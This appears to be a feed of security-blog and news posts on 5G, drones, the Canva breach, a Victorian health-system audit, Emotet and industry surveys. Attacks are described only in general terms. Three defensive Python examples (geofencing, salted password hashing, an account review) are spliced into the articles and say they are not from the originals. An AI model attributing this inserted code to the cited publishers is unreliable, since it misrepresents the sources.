All policies that will be enforced need to be written down; making them part of the employee handbook is an added advantage. The moment a newly hired employee steps into the organization, the IT policies are made known. This prevents a gap between the employee and the employer when it comes to the standard policies governing the office.

Keep software updated across the organization

This takes a lot of effort for the IT team to implement but must be done without compromise. The company may allow a certain level of deferred updates on a small scale for those who critically need to finish a certain project or task, but that should not become an exemption from installing software updates.

Use Open Source software as much as possible

Unlike proprietary software, open source software is quickly patched with new updates as soon as a version with a fix for a known issue is released. In the open source world, there is no need to wait for a “Patch Tuesday” in order to receive a fixed version of the buggy software. Patches are released as soon as the developers implement the solution to the bug, whether security- or feature-wise.

The post Corporate IT Security Starts With Simple Policies appeared first on .

5G Technology and Cybersecurity Concerns

5G is a modern reality, and people no longer think of it as a future concept. As leading network operators announce the beginning of this new era of smart connectivity at the Mobile World Congress, it is clear that 5G will be calling the shots when it comes to shaping the future.

However, in the midst of this craze, the IT community has speculated on the implications of 5G, wondering what exactly it means for the cybersecurity landscape. Taking a cue from history, what we have learned so far is that advanced technology and its adoption are a double-edged sword, which can quickly build and destroy. As reported in a recent Gartner report, two-thirds of companies plan to implement 5G in less than a year, so it’s imperative that they prepare for a new wave of cyber threats, which will be launched on an already vulnerable environment.

Cybersecurity concerns of the 5G world

And yet this exciting new 5G world will have its share of cybersecurity challenges. Cybercriminals around the world will continue to look for ways to access user data. With billions of devices connected to the internet, they have a large attack surface in which to find the weak link in the security chain.

In addition, the ability of hackers to cause damage and destruction is increasing exponentially. In today’s 4G world, a huge network of bots running on home devices can be used to trigger huge DDoS attacks on websites. In tomorrow’s 5G world, the same bot network could be used to take down an entire network of cars driving in a single city, causing chaos on the roads.

Of course, computer security is as important in the 5G world as in the 4G world – and maybe even more so. A huge number of remote sensors and smart devices connected, for example, to global supply chains will greatly increase the complexity of protecting corporate networks from intruders. The huge amount of data generated by 5G networks makes it harder to detect deviations in user behavior caused by hackers.

Basically, 5G is exposed to the same potential risks as its predecessors: authentication, accessibility, data security, and privacy. Since parts of the 5G protocol specifications are inherited from 3G and 4G networks, the vulnerabilities of these previous generations carry over as well. Network downgrade attacks represent a comparable and significant risk; the lack of authentication in the initial connection phase may allow adversaries to downgrade the connection to a 4G or 3G network so that they can exploit existing vulnerabilities.

As with any innovation, 5G will have its own share of use cases in vertical industries that require a modern level of security. Although the technology offers a number of new opportunities for consumers and can transform both public and private sector industries, it is essential that cybersecurity remains at the forefront of every phase of the implementation process.

The post 5G Technology and Cybersecurity Concerns appeared first on .

Cybersecurity and Drones – A Rising Threat?

Drones, which are part of the UAV (unmanned aerial vehicles) group, have certainly seen an increase in popularity in the past few years. The global drone market is expected to grow from $14 billion in 2018 to over $43 billion in 2024. Long gone are the days when drones were only used for military purposes – today they can basically be purchased and flown by anyone. They can be affordable, come in all sizes, and can get as sophisticated as you can imagine.

Drones are now used for a multitude of purposes, ranging from recreational use, photography and filmmaking, agriculture, to surveillance and so many other uses. This technology will soon even be utilized by Amazon to deliver small packages, has already been employed by Domino’s to bring pizza, and UPS has used it to ship medical samples in the US. 

But technology like this can equally be used for good and bad purposes and could easily turn into a sci-fi nightmare. And one of the biggest concerns here is that drones can be hacked, or other drones can be used to hack electronic devices and gather data without one’s consent. 

The malicious uses of drones 

Drones can become a threat to your privacy since they can be used as spying devices. 

Numerous cases have been reported so far. To name a few, a couple flew a drone to watch their neighbors and ended up being arrested, and burglars are now reportedly using drones to scout houses they intend to rob.  

Privacy-related incidents may be so common because many countries don’t have any drone laws in place, or drone users are simply unaware of them. But some countries have released regulations. For example, the UK is currently in the process of updating its Drones Bill, most probably as a response to the famous Gatwick Airport incident, when drone sightings stopped 1,000 flights from December 19-21, 2018 and affected the travel plans of around 140,000 people. The United States has also released regulations for drone users, and you can go through them here if you are flying your drones in the US.

Some drones can even see through walls by employing Wi-Fi and 3D imaging, and could easily create 3D plans of buildings that could facilitate criminals’ access inside them.

Not only that, other prominent issues are related to cyber-attacks which may have seemed impossible in the past but could now be carried out using drone technology. Drones can now be used to hack servers, spy on networks, extract data, and block communications.

Corporate networks can be heavily affected by the malicious use of drones, so companies need to have solid security measures in place to prevent unwanted access and protect themselves from cyber warfare attacks. 

How hackers steal data with drones

Attackers can attach a small computer (such as Raspberry Pi) to a drone, fly it over places where they wouldn’t normally be able or allowed to enter, and then exploit Wi-Fi, Bluetooth, or RFID (Radio-frequency identification) vulnerabilities. 

A cybersecurity company proved during the 2014 Black Hat security conference in Singapore that a drone could basically connect to any device, like smartphones or laptops. They used a drone to intercept data from the attendees’ phones with software dubbed Snoopy that ran on the minicomputer attached to the drone. It could mimic Wi-Fi networks that victims had connected to in the past, and the operators were then able to steal any information that was used on the device, including bank details and passwords.

Also, other sources have shown that drones equipped with a radio transceiver could be used to hijack Bluetooth mice. This means that any other Bluetooth-connected devices could be accessed, such as keyboards, from which attackers could obtain keystrokes and figure out users’ login credentials. 

Your own drone could be hacked easily 

Imagine you are flying your drone, planning to take breathtaking shots of the spectacular location you are exploring and all of a sudden, the drone crashes and hits the ground. Or worse, it starts flying into random people and injures them.  

One way this could happen is through GPS spoofing. This practice involves tricking a GPS receiver by transmitting a fake GPS signal. As a result, the drone will use the wrong location.  

How malicious drones can be stopped  

The anti-drone market is expected to reach $1.85 billion by 2024, which proves that significant efforts are being made to fight hostile drones.

For instance, researchers funded by the EU are trying to find ways to detect and disable malicious drones through the KNOX project. Additionally, a recent study conducted by Fujitsu System Integration Laboratories and the Ben-Gurion University of the Negev addresses the same issue and analyzes methods to detect drones. What’s more, companies AT&T and Dedrone (a drone detection technology start-up) are collaborating to develop IoT solutions against malicious drones.  

Below I’ve included a few methods used to detect rogue drones: 

1. Geofencing  

Geofences are virtual boundaries set up within physical locations where drones can be detected when they reach certain delimited areas.  

How does geofencing work?

This is a location-based service and can be set up using GPS, Wi-Fi, Bluetooth, cellular data or RFID. In order to use geofencing, a developer or admin must create a virtual border around a specified location in GPS- or RFID-enabled software. It’s quite a simple operation and can be represented, for example, by a circle drawn around a location on Google Maps. Technically, the geofence should generate a response the moment an unauthorized drone enters the defined area.

However, this technology may not always be so efficient.

Regular drones have built-in geofencing software, so you can’t unknowingly fly them over restricted areas, but malicious actors could build their own devices without this software or even hack the standard ones. Apparently, there is a website (on the open internet, not on the dark web) that sells hacks for drones manufactured by DJI, the market leader in unmanned aerial vehicles. The hackers’ solutions remove geofencing, altitude, and speed limitations.
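The geofence check described above, from the detector's side rather than the drone's: an added example that is not from the original article or any anti-drone product. The restricted areas, the drone ID and the flight track are constructed, and the monitor raises an event only when a track crosses a boundary, so a loitering drone does not generate an alert every second.

```python
"""Geofence alerting over a constructed drone track.

Added example, not code from the original article or any detection
product. Fences, drone ID and track are constructed; coordinates are
WGS-84 latitude/longitude in degrees, timestamps in seconds.
"""
import math

EARTH_RADIUS_M = 6_371_000.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


class CircularGeofence:
    """The 'circle drawn around a location on a map' case from the text."""

    def __init__(self, name, center_lat, center_lon, radius_m):
        self.name, self.lat, self.lon, self.radius_m = name, center_lat, center_lon, radius_m

    def contains(self, lat, lon):
        return haversine_m(self.lat, self.lon, lat, lon) <= self.radius_m


class PolygonGeofence:
    """Arbitrary boundary such as an airfield perimeter, via ray casting.
    Treats lat/lon as planar, which is adequate for areas a few km across."""

    def __init__(self, name, vertices):
        self.name, self.vertices = name, list(vertices)   # [(lat, lon), ...]

    def contains(self, lat, lon):
        inside = False
        n = len(self.vertices)
        for i in range(n):
            lat_i, lon_i = self.vertices[i]
            lat_j, lon_j = self.vertices[(i + 1) % n]
            # Does a ray from the point along the latitude axis cross edge (i, j)?
            if (lon_i > lon) != (lon_j > lon):
                crossing_lat = (lon - lon_i) * (lat_j - lat_i) / (lon_j - lon_i) + lat_i
                if lat < crossing_lat:
                    inside = not inside
        return inside


class GeofenceMonitor:
    """Keeps each drone's inside/outside state per fence; emits events on transitions only."""

    def __init__(self, fences):
        self.fences = fences
        self.state = {}   # (drone_id, fence_name) -> currently inside?

    def update(self, drone_id, lat, lon, ts):
        events = []
        for fence in self.fences:
            key = (drone_id, fence.name)
            now_inside = fence.contains(lat, lon)
            was_inside = self.state.get(key, False)
            if now_inside and not was_inside:
                events.append(("ENTER", drone_id, fence.name, ts))
            elif was_inside and not now_inside:
                events.append(("EXIT", drone_id, fence.name, ts))
            self.state[key] = now_inside
        return events


def run_constructed_track():
    """Constructed scenario: a 500 m circle around a substation and a rectangular airfield."""
    fences = [
        CircularGeofence("substation", 51.5000, -0.1200, 500.0),
        PolygonGeofence("airfield", [(51.52, -0.14), (51.52, -0.10), (51.53, -0.10), (51.53, -0.14)]),
    ]
    monitor = GeofenceMonitor(fences)
    track = [   # (ts, lat, lon); 0.001 deg of latitude is roughly 111 m
        (0, 51.4900, -0.1200),   # about 1.1 km south of the substation: outside
        (10, 51.4970, -0.1200),  # about 330 m south: inside the circle -> ENTER
        (20, 51.4985, -0.1200),  # still inside: no new event
        (30, 51.5060, -0.1200),  # about 670 m north: left the circle -> EXIT
        (40, 51.5250, -0.1200),  # inside the airfield rectangle -> ENTER
    ]
    events = []
    for ts, lat, lon in track:
        events.extend(monitor.update("drone-constructed-01", lat, lon, ts))
    return events


if __name__ == "__main__":
    for event in run_constructed_track():
        print(event)
```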

2. Radar 

Radar is already the standard go-to mechanism for aerial vehicle detection, so drones can also be detected using radar detection systems.

Drone radars use a combination of noise detection, thermal detection, radio signal detection, and signal identification. However, this method is not fully accurate, as it can easily mistake birds for drones. 

Additionally, some drone radars also use microphones to recognize noise patterns, but this has proved to be ineffective in noisy urban areas. 

3. Acoustic sensors 

These sensors are able to detect drones that sometimes can’t be seen by radars.  

Acoustic sensors recognize the unique sounds generated by different drone types and run them against a sound signatures database. If there’s a match, the system triggers an alert.  

4. RF Scanners 

Radio-frequency scanners examine the electromagnetic spectrum and find the specific transmissions from drones.  

However, RF scanners will only work when radio signals are present. Some drones operate without any RF signals and rely only on GPS, so this method will, in some cases, be ineffective.

5. Thermal imaging 

Thermal imaging cameras work by detecting the heat emitted by almost all objects and materials, including a drone's motors and battery.

So, drone thermal cameras could prove to be powerful tools to detect unwanted UAVs.  

Of course, there are many other methods out there (including hybrids) that are meant to stop malicious drones, which I haven’t mentioned in this article. Here are some more resources I recommend you check out if you want to become an anti-drone expert: 

To Sum Up 

Drones are certainly impacting our daily lives and will, without doubt, make up an important part of the IoT network used in our future smart cities. But sadly, they can be easily misused for malicious purposes. So, a lot of effort should be put into their cybersecurity and using the proper ways to detect and take down the ones which are threatening us.  

What is your opinion on the issues related to drones and cybersecurity? Share your thoughts in the comments section below. 

The post Cybersecurity and Drones – A Rising Threat? appeared first on Heimdal Security Blog.

What mechanisms can help address today’s biggest cybersecurity challenges?

In this Help Net Security podcast, Syed Abdur Rahman, Director of Products with unified risk management provider Brinqa, talks about their risk centric knowledge-driven approach to cybersecurity problems like vulnerability management, application security and cloud and container security. Here’s a transcript of the podcast for your convenience. Hi, my name is Syed Abdur and I’m the Director of Products at Brinqa, where I’m responsible for product management and technical product marketing. Brinqa is a cyber … More

The post What mechanisms can help address today’s biggest cybersecurity challenges? appeared first on Help Net Security.

A veteran’s look at the cybersecurity industry and the problems that need solving

For many in the infosec industry, Daniel Miessler needs no introduction, as he’s a 20-year industry veteran, a professional that fulfilled a variety of security roles at companies like HP and IOActive, a leader of the OWASP IoT Security Project and, most prominently, the author of the popular Unsupervised Learning podcast, newsletter and blog. Apart from effectively curating and summarizing content produced by others, Miessler is also the source of interesting ideas and occasionally unorthodox … More

The post A veteran’s look at the cybersecurity industry and the problems that need solving appeared first on Help Net Security.

Majority of CISOs plan to ask for an increase in cybersecurity investment

Most CISOs of financial institutions (73 percent) plan to ask their organization’s CFO for an increase in cybersecurity investments in the next year, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC), an industry consortium dedicated to reducing cyber-risk in the global financial system. “The advancement and adoption of new technologies coupled with increased geopolitical tension has fueled a rapidly evolving cyber threat landscape,” said Steve Silberstein, CEO of FS-ISAC. “An effective cybersecurity … More

The post Majority of CISOs plan to ask for an increase in cybersecurity investment appeared first on Help Net Security.

Security overconfidence and immaturity continue to endanger organizations

The majority of organizations are ill-prepared to protect themselves against privileged access abuse, the leading cyber-attack vector, according to Centrify and Techvangelism. Seventy-nine percent of organizations do not have a mature approach to Privileged Access Management (PAM), yet 93% believe they are at least somewhat prepared against threats that involve privileged credentials. This overconfidence and immaturity are underscored by 52% of organizations surveyed stating they do not use a password vault, indicating that the majority … More

The post Security overconfidence and immaturity continue to endanger organizations appeared first on Help Net Security.

New initiative aims to strengthen IoT security, interoperability and reliability

The Zigbee Alliance publicly announced a major ongoing initiative to make smart home and IoT products easier to develop, deploy, and sell across ecosystems. The All Hubs Initiative is driven by a Zigbee Alliance workgroup comprised of leading IoT companies including Amazon, Comcast, Exegin, Kwikset, Landis+Gyr, LEEDARSON, Legrand, MMB Networks, NXP, OSRAM, Schneider Electric, Silicon Labs, Somfy, and many others with the goal of improving interoperability between IoT devices and major consumer and commercial platforms. … More

The post New initiative aims to strengthen IoT security, interoperability and reliability appeared first on Help Net Security.

Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies

Businesses find identity and access management (IAM) and privileged access management (PAM) security disciplines difficult, yet they are not concerned about them. The results imply that IAM- and PAM-related security tasks may be deprioritized or neglected, potentially exposing organizations to data breaches and other cyber risks. Conducted at RSA Conference in early March 2019, One Identity’s study polled 200 conference attendees on their biggest security challenges and concerns, as well as their workplace behaviors related to network and system access. … More

The post Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies appeared first on Help Net Security.

Many are seeing the damage of cybercrime and identity theft firsthand

As massive data breaches continue to make international headlines and the Internet is an integral part of our daily lives, consumers are now grasping the risks they face. In a new F-Secure survey, 71% of respondents say they feel that they will become a victim of cybercrime or identity theft, while 73% expressed similar fears about their kids. “These findings are absolutely staggering and show many people are seeing the damage of cybercrime or identity … More

The post Many are seeing the damage of cybercrime and identity theft firsthand appeared first on Help Net Security.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, resulting in 139 million user records compromised.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva claims to securely store all user passwords using the highest standards via the Bcrypt algorithm. Bcrypt is a strong, deliberately slow password-hashing algorithm designed to make cracking difficult and time-consuming, since hashing is a one-way function that cannot simply be reversed. Additionally, each Canva password was salted, meaning that random data was added to each password before hashing so that identical passwords used across the platform do not produce identical hashes. According to ZDNet, 61 million users had their passwords hashed with the Bcrypt algorithm, and 78 million users had their Gmail addresses exposed in the breach.
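The salting point above is easiest to see in code. The following is an added example, not code from the McAfee post or from Canva: bcrypt itself is not in the Python standard library, so PBKDF2-HMAC-SHA256 stands in for it here, but the two properties the paragraph describes (a random per-user salt and a tunable work factor) are the same. The record format, function names and sample password are constructed for this example.

```python
"""Salted, slow password hashing: why two users who chose the same
password do not end up with the same stored value, and how a login
check still works without ever storing the password.

Constructed example. PBKDF2-HMAC-SHA256 (hashlib.pbkdf2_hmac) stands in
for bcrypt, which is not in the standard library; the per-user random
salt and the adjustable cost are the properties under discussion.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional

# Work factor. Kept modest so the demo runs quickly; production settings
# are considerably higher and should be raised as hardware gets faster.
ITERATIONS = 100_000


def hash_password(password: str, iterations: int = ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex.

    A fresh 16-byte random salt is drawn for every call unless one is
    supplied, so hashing the same password twice gives different records.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive the digest with the stored salt and cost, compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iters))
    # compare_digest avoids leaking how many leading bytes matched
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def unsalted_hash(password: str) -> str:
    """A bare fast hash, shown only for contrast: identical passwords collide."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def compare_storage(password: str) -> Dict[str, object]:
    """Two constructed users, alice and bob, picked the same password.

    Returns whether their stored values are identical under each scheme,
    plus the salted records so they can be inspected.
    """
    users = {"alice": password, "bob": password}
    unsalted = {u: unsalted_hash(p) for u, p in users.items()}
    salted = {u: hash_password(p) for u, p in users.items()}
    return {
        "unsalted_identical": unsalted["alice"] == unsalted["bob"],
        "salted_identical": salted["alice"] == salted["bob"],
        "salted_records": salted,
    }


if __name__ == "__main__":
    result = compare_storage("Summer2019!")  # constructed sample password
    print("unsalted hashes identical:", result["unsalted_identical"])
    print("salted records identical: ", result["salted_identical"])
    for user, rec in result["salted_records"].items():
        print(f"{user}: {rec}")
        print("  verify correct password:", verify_password("Summer2019!", rec))
        print("  verify wrong password:  ", verify_password("summer2019!", rec))
```

Because each record carries its own salt and iteration count, the cost can be raised for new passwords without invalidating existing ones.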

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Victoria’s Public Health System “Highly Vulnerable”: Report

Victoria’s public health system is “highly vulnerable” to a Singapore-like data breach, according to a recent report.

As per an auditor general report released recently, the public health system in Victoria is vulnerable to an attack like the one that Singapore had experienced last year. The Singapore data breach had led to the exfiltration of almost 1.5 million patient health records.

The report by the auditor general reads, “Victoria’s public health system is highly vulnerable to the kind of cyberattacks recently experienced by the National Health Service (NHS) in England, in Singapore, and at a Melbourne‐based cardiology provider, which resulted in stolen or unusable patient data and disrupted hospital services.”

The report further explains that there are key weaknesses in the “physical security” and “logical security” of the health services. This includes critical aspects like password management and other user access controls. Low data security awareness among the staff, which increases the success of social engineering attacks (like phishing or tailgating into corporate areas where ICT infrastructure and servers may be located), is also highlighted in the report.

The audit covered four health services, namely Barwon Health (BH), the Royal Children’s Hospital (RCH), and the Royal Victorian Eye and Ear Hospital (RVEEH), plus two different areas of the DHHS (Department of Health and Human Services). The auditor-general’s team managed to exploit security vulnerabilities and access patient data in all four agencies.

The report notes, “The audited health services are not proactive enough, and do not take a whole‐of‐hospital approach to security that recognises that protecting patient data is not just a task for their IT staff.”

It was also noted that health services relied on external services providers, but at the same time, they were not fully aware of the security controls implemented by the platforms that these providers were using.

“The three audited health services are not fully aware of whether their service providers have the necessary security controls. Due to the sector’s reliance on third‐party vendors, health services need to actively monitor vendor performance to ensure that patient data is safe,” says the report.

Victoria’s public health services, which manage their ICT systems independently, are supported on cybersecurity by DHHS’s Digital Health branch, which develops guidance materials, runs awareness and training sessions and funds ICT infrastructure upgrades. A set of 72 baseline cybersecurity controls, which health services need to implement by 2020-21, has also been developed. But none of the public health services in Victoria has fully implemented these 72 controls to date, and they cite different reasons for this.

The audit report explains, “While Digital Health has set a clear roadmap for health services to follow, to date no health service has fully implemented the 72 controls. The audited health services advise that barriers to implementing the controls include a lack of dedicated cybersecurity staff and insufficient resources for ICT projects.”

“While it may be challenging for health services to balance ICT security against clinical projects, implementing all the controls will provide health services with strong baseline protection against cybersecurity risks. Recent, local examples of cyberattacks in health services demonstrate the need for this work to occur,” the report points out.

That there are no penalties for non-compliance is also perhaps one of the reasons for the slow implementation of the controls.

The audit report has brought to light issues pertaining to access control management. It found unused as well as terminated employee accounts that were still enabled and also found a lack of regular user access reviews. The health services did not keep user access forms, which are needed to authenticate users. The audit also revealed that many passwords, even on administrator accounts, were easily hackable. Some of these were even system default ones. It was also found that health services rarely used multi‐factor authentication, even for ICT staff and administrator accounts.
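The access-control findings above (departed staff still enabled, accounts nobody uses, no access reviews, administrator accounts without MFA or still on a never-changed password) are exactly what a periodic user access review is meant to catch. The following is an added example, not part of the audit report or the article: a review run over a constructed account export, with made-up usernames and field names.

```python
"""Periodic user access review over an exported account list.

Constructed example. The account records, field names and review date
are made up; the checks mirror the audit findings: enabled accounts of
terminated staff, dormant accounts, administrators without multi-factor
authentication, and administrators whose password was never changed
after account creation (a common sign of a system default still in use).
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional


@dataclass
class Account:
    username: str
    enabled: bool
    employment_status: str          # "active" or "terminated" (from HR feed)
    last_login: Optional[date]      # None means the account has never logged in
    created: date
    password_changed: Optional[date]  # None means never changed since creation
    is_admin: bool
    mfa_enabled: bool


DORMANT_DAYS = 90  # review threshold for accounts with no recent sign-in


def review_accounts(accounts: List[Account], today: date,
                    dormant_days: int = DORMANT_DAYS) -> Dict[str, List[str]]:
    """Return usernames grouped by finding type. Empty lists mean a clean result."""
    findings: Dict[str, List[str]] = {
        "terminated_still_enabled": [],
        "dormant": [],
        "admin_without_mfa": [],
        "admin_default_password": [],
    }
    cutoff = today - timedelta(days=dormant_days)
    for acct in accounts:
        # Leaver whose account was never disabled
        if acct.enabled and acct.employment_status == "terminated":
            findings["terminated_still_enabled"].append(acct.username)
        # Enabled account with no sign-in inside the review window
        if acct.enabled and (acct.last_login is None or acct.last_login < cutoff):
            findings["dormant"].append(acct.username)
        # Privileged account relying on a password alone
        if acct.is_admin and acct.enabled and not acct.mfa_enabled:
            findings["admin_without_mfa"].append(acct.username)
        # Privileged account whose password predates or equals account creation
        if acct.is_admin and (acct.password_changed is None
                              or acct.password_changed <= acct.created):
            findings["admin_default_password"].append(acct.username)
    return findings


# Constructed sample export; none of these accounts are real.
REVIEW_DATE = date(2019, 6, 1)
SAMPLE_ACCOUNTS = [
    Account("jsmith", True, "active", date(2019, 5, 30), date(2017, 3, 1),
            date(2019, 3, 1), False, False),
    Account("tbrown", True, "terminated", date(2019, 1, 10), date(2016, 8, 15),
            date(2018, 11, 2), False, False),
    Account("svc_backup", True, "active", None, date(2018, 6, 1),
            date(2018, 6, 1), False, False),
    Account("dba_admin", True, "active", date(2019, 5, 31), date(2018, 2, 1),
            None, True, False),
    Account("secops", True, "active", date(2019, 5, 29), date(2018, 1, 10),
            date(2019, 4, 1), True, True),
]


if __name__ == "__main__":
    for finding, users in review_accounts(SAMPLE_ACCOUNTS, REVIEW_DATE).items():
        print(f"{finding}: {', '.join(users) if users else 'none'}")
```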

The report from the Auditor-General’s office also includes a detailed list of recommendations to be followed.


When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm’s statistics, in Q1 2019 a whopping 61 percent of all malicious payloads distributed via email were Emotet. The nature of the malicious payloads: Emotet started its life as a banking Trojan, but has morphed over time and became a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks … More

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

IoT cyberattacks are the new normal, the security mindset isn’t

Eight in ten organizations have experienced a cyberattack on their IoT devices in the past 12 months, according to new research by Irdeto. Of those organizations, 90% experienced an impact as a result of the cyberattack, including operational downtime and compromised customer data or end-user safety. This demonstrates the security limitations of many IoT devices and the need for organizations to think carefully about a cybersecurity strategy amidst an IoT deployment. The impact of IoT … More

The post IoT cyberattacks are the new normal, the security mindset isn’t appeared first on Help Net Security.

UK’s FOI Request Exposes British Government Cybersecurity Weaknesses

Through the United Kingdom’s Freedom of Information regime, data and statistics that used to be state secrets are exposed for public consumption and scrutiny. It gives people from all walks of life a venue for forming their own views on how the former superpower manages its affairs, for or against its national agenda. Private companies may also ask the UK government for information that used to be considered “security sensitive”, making it a public document for anyone to check.

Recently, SolarWinds, a private firm in the IT management sector, disclosed the result of its Freedom of Information (FOI) request, showing that the public sector experienced an increasing number of cyber attacks over the past year, 2018. 18% of all public sector bodies in the UK experienced ransomware, phishing attacks or common virus infections, especially those that interface with foreign or diplomatic entities. The same report also shows that the effectiveness of available antimalware solutions on the market reaches 96%, or 98% if you count the solutions categorized as endpoint protection (corporate-level antivirus products). Firewall hardware was also a focus of the review, as it successfully blocked unauthorized access 98% of the time.

Unfortunately, the statistics show a weakness in the public sector’s capability to perform a post-incident audit once a cyber attack has succeeded, because only 73% of public sector bodies have a reliable log management system in their network installations. These same organizations also lack dependable network traffic analysis, which is needed for forensic investigations after a cyber attack. “While preparation is generally high throughout the public sector, the growth in large numbers of attacks shows that there is still a significant risk. These results highlight the importance of finding simple-to-use, affordable, and scalable security solutions that can work across the varied IT environments like those in the NHS and central government, to ensure the most comprehensive protection available for these vital services,” explained Sascha Giese, SolarWinds’ Technical Lead.

Just like the rest of the European region, the UK public sector faces many challenges: since it is funded by British taxes, paying for a credible cybersecurity defense posture is not a walk in the park. A defense posture requires not only the hardware and software that run the entire infrastructure but also human operators; IT professionals such as network administrators, database administrators and software developers cost money to hire and to keep productive and happy in their jobs.

The saddest part of the report is that around 9% of the UK public sector has no organized way to train its employees to be aware of cybersecurity risks, while another 15% simply leave their current employees to their own devices, ignoring the risk of new flaws, exploits and social engineering techniques that may one day victimize one of those employees. Login credential theft is not uncommon either: because public sector employees are privileged with access to public information, their login credentials are top prizes for threat actors to steal.


Structural integrity: Quantifying risk with security measurement

In my previous post, we set up the foundation for a risk quantification program. Many organizations have begun this part of their security strategy and are learning how to approach this challenge, which has plagued the security industry for years. In this part, we talk about how a winning security metrics strategy aligns with the business’ goals and objectives and lay out the framework to develop the metrics strategy. Security metrics are business metrics A … More

The post Structural integrity: Quantifying risk with security measurement appeared first on Help Net Security.

SD-WAN alone cannot address the networking challenges of digital business

Enterprise IT professionals are turning to managed services for their SD-WAN deployments. At the same time, a new Cato Networks survey finds legacy telco services inadequately address customer expectations around speed, agility, and overall value. “The digital business demands a faster, more agile network to drive growth and compete effectively in the marketplace. Legacy telcos rely on rigid, fragmented, and expensive bundles of point solutions — an approach incompatible with the digital business. To support … More

The post SD-WAN alone cannot address the networking challenges of digital business appeared first on Help Net Security.

Network automation market expected to grow to $16.9 billion by 2022

According to market research by MarketsandMarkets, the network automation market size is expected to grow from $2.3 billion in 2017 to $16.9 billion by 2022, at a Compound Annual Growth Rate (CAGR) of 48.7% during the forecast period. Major drivers of the network automation market include the critical need for network bandwidth management and network visibility, and growing adoption of smart connected devices across industry verticals. Moreover, increasing adoption of virtual and software-defined network infrastructure … More

The post Network automation market expected to grow to $16.9 billion by 2022 appeared first on Help Net Security.

How to diminish the great threat of legacy apps

The Equifax breach underscored the risk posed by unpatched software applications. As a refresher, 146 million customer records were exposed after a known vulnerability in Apache Struts was exploited. The reality is enterprises are supporting an ever-growing number of applications, both commercial and homegrown which has created many challenges in maintaining proper security patches for even the most critical applications. That same challenge becomes even more difficult when you consider legacy enterprise applications that are … More

The post How to diminish the great threat of legacy apps appeared first on Help Net Security.

Volume and quality of training data is the largest barrier to applying machine learning

IDC predicts worldwide spending on artificial intelligence (AI) systems will reach $35.8 billion in 2019, and 84% of enterprises believe investing in AI will lead to greater competitive advantages (Statista). However, nearly eight out of 10 enterprise organizations currently engaged in AI and machine learning (ML) report that projects have stalled, and 96% of these companies have run into problems with data quality, data labeling required to train AI, and building model confidence, according to … More

The post Volume and quality of training data is the largest barrier to applying machine learning appeared first on Help Net Security.

How many adults trust companies with their personal data?

More than one third (36%) of adults aged 16–75 trust companies and organizations with their personal data more since GDPR came into effect one year ago, according to TrustArc. There are positive sentiments toward enforcement activity, and half (47%) of respondents have exercised some of their GDPR privacy rights. 57% of respondents are also more likely to use websites that have a certification mark or seal to demonstrate GDPR compliance. “The research tells a tale … More

The post How many adults trust companies with their personal data? appeared first on Help Net Security.

The Language of Risk: Bridging the Disconnect between the C-Suite and Cyber Security Experts

With data breaches regularly marking the headlines, it is no surprise that digital threats constitute an increasingly significant concern for the C-Suite and cyber security experts. What is surprising, however, is that these two groups don’t seem to share the same view of information security. They have different opinions when it comes to the digital […]… Read More

The post The Language of Risk: Bridging the Disconnect between the C-Suite and Cyber Security Experts appeared first on The State of Security.

Rise of cyber-physical attacks


It was back in 2012 when the then Defense Secretary of the United States warned of the possibility of the country facing a “cyber-Pearl Harbor”. He painted a bleak possibility – that extremist groups and enemy nations would use cyber tools to gain access to critical switches and disrupt transport and infrastructure.

